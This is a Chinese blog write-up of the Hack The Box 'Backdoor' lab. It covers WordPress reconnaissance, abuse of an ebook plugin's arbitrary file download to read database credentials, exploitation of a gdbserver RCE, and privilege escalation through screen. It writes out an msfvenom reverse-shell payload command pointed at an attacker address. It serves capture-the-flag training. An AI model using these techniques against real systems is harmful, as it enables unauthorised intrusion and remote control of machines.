当前位置:网站首页>[HTB]渗透Backdoor靶机
[HTB]渗透Backdoor靶机
2022-08-11 05:31:00 【欢乐的小鸡】
对靶机进行信息收集
发现是由WordPress 5.8.1搭建
使用wpscan看一下有没有漏洞
没有找到漏洞只看到了一个管理员账号admin
使用searchsploit工具扫描后发现有三个插件有漏洞,但是我们没有办法确定靶机里面有没有这三个插件
访问content/plugins看看,发现了ebook插件
发现这个插件是任意插件下载漏洞,下载配置文件
查看配置文件发现了数据库账号和密码
下载进程看看有没有异常进程
这个嘛我找到了异常进程也知道了pid可是我通过插件的任意文件下载漏洞下载出了问题,也用burp跑了pid900-1000也没有办法跑出来
最后还是没有能下载或爆出来,然后看了一下国外大佬的writeup他们都是用脚跑的
这里有两个脚本
都可以试试
结果在814我说怎么用burp爆不出来
gdbserver有个RCE漏洞metsaploit模块里面有也可以使用脚本两种方法都可以
把payload改为x64的
进去后shell在根目录有个user.txt就有falg
第二种方法
使用msfconsole创建linux反弹木马
使用gdbserver的rce的exploit
脚本:https://www.exploit-db.com/exploits/50539
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 PrependFork=true -o linux.bin
利用python建立交互shell
利用screen提权
提权语句
两种方法的提权方法都是screen提权
边栏推荐
猜你喜欢
随机推荐
Real-time Feature Computing Platform Architecture Methodology and Practice Based on OpenMLDB
Asis2016 books null off by one
Node stepping on the pit 80 port is occupied
C-8月1日-递归与动态内存管理
Lua 快速入门(六)——基础OOP
Content Size Fitter的使用
Lua 元表(Metatable)
解决AttributeError: ‘NoneType‘ object has no attribute ‘val‘ if left.val!=right.val:Line 17 问题
BaseActvity的抽取
Lua 协同程序(coroutine)
C语言-7月19日-指针的学习
【LeetCode-36】有效的数独
【LeetCode-389】找不同
UML 类图之间的关系
【无标题】
Unity 使用双缓冲实现一个好用的计时器
详解程序执行过程
JS小技巧,让你编码效率杠杠的,快乐摸鱼
星盟-pwn-fog
微信小程序云开发项目wx-store代码详解